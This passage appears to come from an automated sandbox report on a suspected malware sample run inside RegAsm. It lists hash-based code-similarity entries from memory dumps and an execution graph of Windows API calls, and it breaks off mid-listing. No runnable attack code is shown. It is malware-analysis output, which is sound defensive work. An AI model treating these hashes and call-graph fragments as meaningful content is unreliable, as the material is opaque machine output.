                                                                                                                                                                                                                                          • Opcode ID: 7652ed8bde30f2cb5aef1f8b24a1a80c1aab48073b68026453e39e8dd2f9aece
                                                                                                                                                                                                                                          • Instruction ID: 60f3d0154dc8266089c903b58488102ddb80af514f8dc938928bd65b5462b627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7652ed8bde30f2cb5aef1f8b24a1a80c1aab48073b68026453e39e8dd2f9aece
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8D1F831C2075A9ACB11EFA4D950A9DF7B5FF95300F208BAAD10977610EB746AC9CF81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6befec7cdb117e6ddc962389142853c1bd7032988ca0fb0bfb622dbc4f94e60f
                                                                                                                                                                                                                                          • Instruction ID: 92eb27260295b3b7b62aa15129073d06c82fc7228747ff245bb2297aabe0bc5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6befec7cdb117e6ddc962389142853c1bd7032988ca0fb0bfb622dbc4f94e60f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B019E35E05248DFCB85CF94E8419AEBBB4EF46312F118186E615AB262C631DD10DF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0d1b465d66bbac5cb88e3ff008063152888a9dbf395ae48bf86ac596c9e89bea
                                                                                                                                                                                                                                          • Instruction ID: cfdc535d81aa0fd90cea89d9bf03d23abb90b662caecdcbcc665217c0047ee7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d1b465d66bbac5cb88e3ff008063152888a9dbf395ae48bf86ac596c9e89bea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E01270E6A10EDEEB94DF62C0557FFF674BB45204F205445C50673280DB7486458FA7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7916334ab9ce16e30352acc19d89bc5336549c82b1fff77a042e5b569a515691
                                                                                                                                                                                                                                          • Instruction ID: 21dacb0646cae2a8baff65029ca3a6f40064696165445f2ca526e8bdb855a9c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7916334ab9ce16e30352acc19d89bc5336549c82b1fff77a042e5b569a515691
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0A571C54219CEEBA49F52D8487BDBAB0EB0B305F10516AD11673190CBB44684CFC4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-1183586631
                                                                                                                                                                                                                                          • Opcode ID: bdd9a18a45b340482b7e8eaf4ebc19833c62636f0ddc0d5b2e4fd7b3be1376fe
                                                                                                                                                                                                                                          • Instruction ID: 9aa54cf80fbaa7c244aeda2696b4cdee1e6f24aecffc13c5c5f2989bb262f1c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdd9a18a45b340482b7e8eaf4ebc19833c62636f0ddc0d5b2e4fd7b3be1376fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D19F313207126BC209AAA1AC91E7DF65BFB8A300B54483CE3054F7A5DF796C1EC396
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-1183586631
                                                                                                                                                                                                                                          • Opcode ID: 8e69d17641345fda3567756e70778955d14538078df03c11ddbabfe8d339d6e4
                                                                                                                                                                                                                                          • Instruction ID: 53c3e15756b7d791472ee223cc652fca7041d182fcc459ac536b01c46659f734
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e69d17641345fda3567756e70778955d14538078df03c11ddbabfe8d339d6e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0D19F313207126BC209AAA1AC91E7DF657FB8A300B54483CE3054F7A5DF796C1AC396
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-2763555283
                                                                                                                                                                                                                                          • Opcode ID: 51190f53b359a35eb7fc02c1afaec19319bdb37fff16acdf2086872f91c56b39
                                                                                                                                                                                                                                          • Instruction ID: 88c3d337555965d0ab0529833b0eedfbd5701fbdccdba57edd53423a615f58a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51190f53b359a35eb7fc02c1afaec19319bdb37fff16acdf2086872f91c56b39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC41A5313107126BD209AAA5A841A3DF657FB8A300B90493DD3094F6A5CF7E6D0DC39A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-2763555283
                                                                                                                                                                                                                                          • Opcode ID: 402ca8815bc55252ea6a4ac460232958c12ec88472b3683e45aa330f75c69c42
                                                                                                                                                                                                                                          • Instruction ID: 8df3d72a0c3bc077361d3aa0470d461b5c6a3dbd281407ebba47686df9836ab3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 402ca8815bc55252ea6a4ac460232958c12ec88472b3683e45aa330f75c69c42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6941B5313507122BD609AAA5A841E3DF65BFB8A300F90493DD3094F6A5CF7E6D09C39A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-1199883655
                                                                                                                                                                                                                                          • Opcode ID: 2704a01b767129ae4f6638869efb8469d39ae54564d718e56702da5f801bd774
                                                                                                                                                                                                                                          • Instruction ID: 36b124fdd2173237b8d0a5deabcd4fd0ccc7f32a4eaf76b5c091fb4b5eb6a916
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2704a01b767129ae4f6638869efb8469d39ae54564d718e56702da5f801bd774
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C31C8313503122FD6099AA5A840E7DFA5BFF8A300B90493DE3098F6A5CF7D6D09C396
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-1199883655
                                                                                                                                                                                                                                          • Opcode ID: 28ae008337860d87159d4e6e7e846942d86931872eade53cbc4ae9201ee34ff1
                                                                                                                                                                                                                                          • Instruction ID: a1b76f85034b76fcd7c0c6229a5604ad3a9a1230b039aa3df4ace239abd031a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28ae008337860d87159d4e6e7e846942d86931872eade53cbc4ae9201ee34ff1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21B6313503126BC609AAA5A840E3DF65BFF8A300F90493DE3094F6A5CF7D6C09C39A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-3704558559
                                                                                                                                                                                                                                          • Opcode ID: 34d44d649b0333a63fcc1d4e22ebdd10de0925f65ffde57e404039f73726a3de
                                                                                                                                                                                                                                          • Instruction ID: 28c86c2ab0d3f9599aaa5a96ca58ff1f7763e231dedee75cb3af86cf274faa8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34d44d649b0333a63fcc1d4e22ebdd10de0925f65ffde57e404039f73726a3de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31D4313016626FCB096BA1AD44D6D7B67FB9A300B54413DE30A8F6B4CEB85D4EC782
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-3704558559
                                                                                                                                                                                                                                          • Opcode ID: 0f3f274852619ea071ccf415e131b20854562c4dc883f8666653b45123e754e7
                                                                                                                                                                                                                                          • Instruction ID: bca237f2e458264db0f9808c329b50facbb1b9fad7db9369848de19f6b9370e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f3f274852619ea071ccf415e131b20854562c4dc883f8666653b45123e754e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA2187313006626FC7096BA5D944C6D7B5BFB9A300B54413DE30A8F6B4CEB95D4EC782
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (_]q$(_]q$(_]q$(_]q$(_]q$(_]q
                                                                                                                                                                                                                                          • API String ID: 0-414434136
                                                                                                                                                                                                                                          • Opcode ID: f57a547201a20023193c5a02d350b5598a87005e79fbafc36f56177a160974a3
                                                                                                                                                                                                                                          • Instruction ID: 4a23021536b4393e8b204cc706961162284016e29f6e9a7b67062f872af11103
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f57a547201a20023193c5a02d350b5598a87005e79fbafc36f56177a160974a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D1C174A142549FDB44AF68D4545AEBBB2FF86300F2485AEE80ADB381DA319D06CB91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-714615153
                                                                                                                                                                                                                                          • Opcode ID: 5a08b5cf04fc7ca81f6f012b4e51657a2c303812c484430ed67593c233906a0e
                                                                                                                                                                                                                                          • Instruction ID: b9bb865615e6115e1a49255b54474de470d1ba5be04cccdc156e59d90f07d43a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a08b5cf04fc7ca81f6f012b4e51657a2c303812c484430ed67593c233906a0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21A7313107112BD2095AA5A850A6DBA5BFB86700F90493DD3058F6A5CF7D5D1DC396
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: D:j$D:j$D:j$D:j$D:j$D:j
                                                                                                                                                                                                                                          • API String ID: 0-714615153
                                                                                                                                                                                                                                          • Opcode ID: d9ddb612c91692d150ac4b7438df7172e3ed102ad1f0b4852ea1eb1914b6bec2
                                                                                                                                                                                                                                          • Instruction ID: eae4cadce2e9faf7ebf4b0ccc2f7232c3b3b141437f727b4b1dc76f6d42bd2f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ddb612c91692d150ac4b7438df7172e3ed102ad1f0b4852ea1eb1914b6bec2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD11D8313103122BC3096AA5A840E3DF65BFB8A700F904A3DD3054F694CF7E6D19C396

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:14.3%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:23.6%
                                                                                                                                                                                                                                          Total number of Nodes:1850
                                                                                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                                                                                          execution_graph 10762 41945f __set_app_type __p__fmode __p__commode 10763 4194ce 10762->10763 10764 4194e2 10763->10764 10765 4194d6 __setusermatherr 10763->10765 10774 4195d6 _controlfp 10764->10774 10765->10764 10767 4194e7 _initterm __getmainargs _initterm 10768 41953b GetStartupInfoA 10767->10768 10770 41956f GetModuleHandleA 10768->10770 10775 4074d5 _EH_prolog 10770->10775 10774->10767 10778 405bfc ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 10775->10778 11181 402017 GetModuleHandleW CreateWindowExW 10778->11181 10781 4074b4 MessageBoxA 10783 4074cb exit _XcptFilter 10781->10783 10782 405c3a 10782->10781 10784 405c54 10782->10784 10785 4014eb 2 API calls 10784->10785 10786 405c8b 10785->10786 10787 4014eb 2 API calls 10786->10787 10788 405c96 10787->10788 11184 404794 10788->11184 10793 402ab8 2 API calls 10794 405cd2 10793->10794 11193 4030cc 10794->11193 10796 405cdb lstrlenW 11207 40574f 10796->11207 10801 40574f 9 API calls 10802 405d11 10801->10802 10803 40574f 9 API calls 10802->10803 10804 405d1c 10803->10804 11223 404d0b #17 10804->11223 10807 405d34 wsprintfW 10809 405d51 10807->10809 10808 4011b7 2 API calls 10808->10807 10810 40574f 9 API calls 10809->10810 10811 405d63 10810->10811 11249 4046e2 10811->11249 10814 4046e2 3 API calls 10816 405dbe 10814->10816 10815 405d7b _wtol 10817 405d91 10815->10817 10818 405dc4 10816->10818 10819 405df8 10816->10819 10817->10814 11472 4052de 10818->11472 10821 4046e2 3 API calls 10819->10821 10822 405e03 10821->10822 10823 405e14 10822->10823 10824 405e09 10822->10824 10827 4046e2 3 API calls 10823->10827 11494 4056f2 10824->11494 10833 405e23 10827->10833 10829 405ddc ??3@YAXPAX ??3@YAXPAX 10829->10783 10830 405e59 GetModuleFileNameW 10831 405e6b 10830->10831 10832 405e7d 10830->10832 10835 409606 57 API calls 10831->10835 10836 4046e2 3 API calls 10832->10836 10833->10830 10834 4011b7 2 API calls 10833->10834 10834->10830 11026 405dc9 ??3@YAXPAX 10835->11026 10847 405e9f 10836->10847 10837 406047 10838 40143c 2 API calls 10837->10838 10839 406057 10838->10839 10840 40143c 2 API calls 10839->10840 10844 406064 10840->10844 10841 405f9c 10843 4046e2 3 API calls 10841->10843 10842 405f69 10842->10841 10846 405f85 _wtol 10842->10846 10842->11026 10855 405ffb 10843->10855 10845 4060e9 10844->10845 10849 401403 2 API calls 10844->10849 10848 402696 3 API calls 10845->10848 10846->10841 10847->10837 10847->10841 10847->10842 10852 401795 2 API calls 10847->10852 10847->11026 10850 40610b 10848->10850 10851 406099 10849->10851 10853 401403 2 API calls 10850->10853 10854 401403 2 API calls 10851->10854 10852->10847 10856 406116 ??2@YAPAXI 10853->10856 10860 4060af 10854->10860 10855->10837 10857 404e9f 2 API calls 10855->10857 10858 406122 10856->10858 10859 40602c 10857->10859 11254 4123e3 10858->11254 10859->10837 10861 40143c 2 API calls 10859->10861 10862 40143c 2 API calls 10860->10862 10861->10837 10863 4060d9 10862->10863 10865 40247d 19 API calls 10863->10865 10867 4060e0 10865->10867 10870 402ab8 2 API calls 10867->10870 10868 406175 11257 402b19 10868->11257 10869 40614f 10871 409606 57 API calls 10869->10871 10870->10845 10871->11026 10875 40618a 10876 406190 10875->10876 10877 4061b4 10875->10877 10878 409606 57 API calls 10876->10878 10879 406246 10877->10879 10881 4046e2 3 API calls 10877->10881 10880 406198 ??3@YAXPAX 10878->10880 11291 4127e6 10879->11291 10880->11026 10884 4061cb 10881->10884 10884->10879 10892 4061d1 10884->10892 10885 406273 10887 40622a ??3@YAXPAX 10885->10887 10896 40627c 10885->10896 10887->11026 10889 406268 ??3@YAXPAX 10889->11026 10890 406288 wsprintfW 10893 40247d 19 API calls 10890->10893 10891 4062bb 11294 404f0e 10891->11294 10892->10887 11502 40599c 10892->11502 10893->10896 10896->10890 10896->10891 10900 40574f 9 API calls 10896->10900 10898 40574f 9 API calls 10953 4062da 10898->10953 10899 406200 10899->10887 10901 406206 10899->10901 10900->10896 10902 409606 57 API calls 10901->10902 10903 40620e ??3@YAXPAX 10902->10903 10903->11026 10904 406594 10905 4065f3 10904->10905 10906 402a67 2 API calls 10904->10906 10907 40574f 9 API calls 10905->10907 10908 4065b2 10906->10908 10910 406624 10907->10910 10911 404bfd 3 API calls 10908->10911 10909 404505 lstrlenW lstrlenW _wcsnicmp 10909->10953 10912 402a67 2 API calls 10910->10912 10913 4065c5 10911->10913 10914 40662f 10912->10914 10915 40143c 2 API calls 10913->10915 11359 404bfd 10914->11359 10918 4065d1 ??3@YAXPAX ??3@YAXPAX 10915->10918 10920 405976 4 API calls 10918->10920 10922 4065eb 10920->10922 10921 40143c 2 API calls 10923 406650 ??3@YAXPAX ??3@YAXPAX 10921->10923 10924 405950 4 API calls 10922->10924 11371 405976 10923->11371 10924->10905 10926 40666a 11376 405950 10926->11376 10928 406672 10929 40574f 9 API calls 10928->10929 10930 40667f 10929->10930 10931 404f0e 26 API calls 10930->10931 10932 406688 10931->10932 10933 4067f4 10932->10933 11585 402744 AllocateAndInitializeSid 10932->11585 11381 4029a6 10933->11381 10937 4066af 10939 4014eb 2 API calls 10937->10939 10938 40689f 11384 404952 10938->11384 10941 4066b7 10939->10941 10940 402a67 2 API calls 10983 40680b 10940->10983 10944 4014eb 2 API calls 10941->10944 10942 4064b5 _wtol 10942->10953 10946 4066bf GetCommandLineW 10944->10946 10949 404e9f 2 API calls 10946->10949 10947 406926 CoInitialize 10955 4029a6 lstrcmpW 10947->10955 10948 4014eb 2 API calls 10948->10953 10954 4066cf 10949->10954 10950 4068a1 ??3@YAXPAX 10950->10938 10952 4029a6 lstrcmpW 10956 4068d5 10952->10956 10953->10904 10953->10909 10953->10942 10953->10948 10957 404e9f 2 API calls 10953->10957 10984 4065f8 ??3@YAXPAX 10953->10984 11557 405195 10953->11557 11568 4049a9 10953->11568 11582 401503 10953->11582 10958 402a67 2 API calls 10954->10958 10959 40694c 10955->10959 10960 4068e5 10956->10960 10964 40247d 19 API calls 10956->10964 10957->10953 10961 4066da 10958->10961 10963 406960 10959->10963 10970 401403 2 API calls 10959->10970 11600 404495 10960->11600 10967 404cb1 2 API calls 10961->10967 10962 4014eb ??2@YAPAXI ??3@YAXPAX 10962->10983 10971 4044ae 16 API calls 10963->10971 10964->10960 10974 4066f8 10967->10974 10968 40143c 2 API calls 10968->10983 10970->10963 10975 406966 10971->10975 10977 404ccf 2 API calls 10974->10977 10980 4029a6 lstrcmpW 10975->10980 10976 40844b 22 API calls 10981 406908 10976->10981 10978 406705 10977->10978 10982 404ccf 2 API calls 10978->10982 10979 401403 2 API calls 10979->10983 10985 406976 10980->10985 11603 4081be ??3@YAXPAX 10981->11603 10987 406712 10982->10987 10983->10938 10983->10940 10983->10950 10983->10962 10983->10968 10983->10979 11593 4035cf ??2@YAPAXI 10983->11593 11599 402990 ??3@YAXPAX ??3@YAXPAX 10983->11599 10984->11026 10989 406a4f 10985->10989 10996 40698f lstrlenW 10985->10996 11588 404ced 10987->11588 10992 4029a6 lstrcmpW 10989->10992 10990 406913 ??3@YAXPAX 10990->10947 10993 406a60 10992->10993 10997 406a74 10993->10997 10998 406a67 _wtol 10993->10998 11014 4069a7 10996->11014 11001 406a96 10997->11001 11604 4097f6 10997->11604 10998->10997 10999 4017c0 2 API calls 11002 40672c 10999->11002 11000 40687c ??3@YAXPAX 11003 4029a6 lstrcmpW 11000->11003 11006 406aaa 11001->11006 11007 406a86 ??3@YAXPAX 11001->11007 11621 4096fb 11001->11621 11005 40143c 2 API calls 11002->11005 11003->10983 11008 406738 7 API calls 11005->11008 11049 406adb 11006->11049 11390 4015d8 11006->11390 11007->11001 11010 4053b2 9 API calls 11008->11010 11012 406780 11010->11012 11015 40678a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11012->11015 11016 4067be ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11012->11016 11020 401503 2 API calls 11014->11020 11015->11026 11016->11026 11017 406ac1 ??3@YAXPAX 11017->11026 11018 4014eb 2 API calls 11018->11049 11020->10989 11021 406c64 ??3@YAXPAX 11021->11026 11022 406b19 GetKeyState 11022->11049 11023 406cc6 11024 406cfc 11023->11024 11025 406cce 11023->11025 11029 4013d1 2 API calls 11024->11029 11675 4048a3 11025->11675 11489 4047e1 11026->11489 11027 401795 ??2@YAPAXI ??3@YAXPAX 11027->11049 11032 406d0a 11029->11032 11035 4044ae 16 API calls 11032->11035 11033 4029a6 lstrcmpW 11033->11049 11034 40143c 2 API calls 11036 406ceb ??3@YAXPAX 11034->11036 11037 406d13 11035->11037 11045 406d33 11036->11045 11038 406d24 ??3@YAXPAX 11037->11038 11042 40143c 2 API calls 11037->11042 11038->11045 11039 406cb6 ??3@YAXPAX ??3@YAXPAX 11039->11026 11040 406c59 ??3@YAXPAX 11040->11049 11041 406c83 11043 409606 57 API calls 11041->11043 11042->11038 11044 406c8f ??3@YAXPAX ??3@YAXPAX 11043->11044 11044->11026 11047 406d70 11045->11047 11048 406d7d 11045->11048 11046 401403 ??2@YAPAXI ??3@YAXPAX 11046->11049 11403 4019d2 ??2@YAPAXI 11047->11403 11688 408caa 11048->11688 11049->11018 11049->11021 11049->11022 11049->11023 11049->11027 11049->11033 11049->11039 11049->11040 11049->11041 11049->11046 11654 408bec 11049->11654 11667 408c6a 11049->11667 11052 406d79 11053 406dba 11052->11053 11054 406d8f 11052->11054 11055 404952 22 API calls 11053->11055 11696 40477e 11054->11696 11057 406dbf 11055->11057 11059 4073b0 11057->11059 11060 4014eb 2 API calls 11057->11060 11062 407428 11059->11062 11064 4029a6 lstrcmpW 11059->11064 11061 406ddd 11060->11061 11104 406df0 11061->11104 11700 404e49 11061->11700 11063 40746b ??3@YAXPAX ??3@YAXPAX 11062->11063 11069 4029a6 lstrcmpW 11062->11069 11067 407484 11063->11067 11068 40748a ??3@YAXPAX 11063->11068 11066 4073e1 11064->11066 11066->11062 11757 404765 11066->11757 11067->11068 11070 4047e1 3 API calls 11068->11070 11071 407447 11069->11071 11073 40749b ??3@YAXPAX ??3@YAXPAX 11070->11073 11071->11063 11075 407454 11071->11075 11072 4014eb ??2@YAPAXI ??3@YAXPAX 11072->11104 11073->10783 11078 4013d1 2 API calls 11075->11078 11076 406e1f 11079 407246 ??3@YAXPAX ??3@YAXPAX 11076->11079 11080 406e2c 11076->11080 11084 407463 11078->11084 11083 40734f 11079->11083 11085 404ccf 2 API calls 11080->11085 11081 4029a6 lstrcmpW 11081->11104 11082 40844b 22 API calls 11086 40741d 11082->11086 11087 4073a7 ??3@YAXPAX 11083->11087 11093 404952 22 API calls 11083->11093 11761 405793 11084->11761 11089 406e48 11085->11089 11760 4081be ??3@YAXPAX 11086->11760 11087->11059 11095 404ccf 2 API calls 11089->11095 11090 406e8c 11092 401403 2 API calls 11090->11092 11096 406e95 11092->11096 11097 40735e 11093->11097 11098 406e55 11095->11098 11100 4044e2 20 API calls 11096->11100 11461 4051f3 11097->11461 11103 40143c 2 API calls 11098->11103 11099 4072ac ??3@YAXPAX ??3@YAXPAX 11099->11083 11119 406e9e 11100->11119 11101 401403 2 API calls 11101->11104 11106 406e61 ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 11103->11106 11104->11072 11104->11076 11104->11081 11104->11090 11104->11099 11104->11101 11107 401795 2 API calls 11104->11107 11105 407377 SetCurrentDirectoryW 11108 4051f3 18 API calls 11105->11108 11109 406e88 11106->11109 11110 40725d 11106->11110 11112 406f2c ??3@YAXPAX ??3@YAXPAX 11107->11112 11113 40739f 11108->11113 11109->11090 11111 40477e 16 API calls 11110->11111 11114 407262 11111->11114 11112->11104 11115 40477e 16 API calls 11113->11115 11116 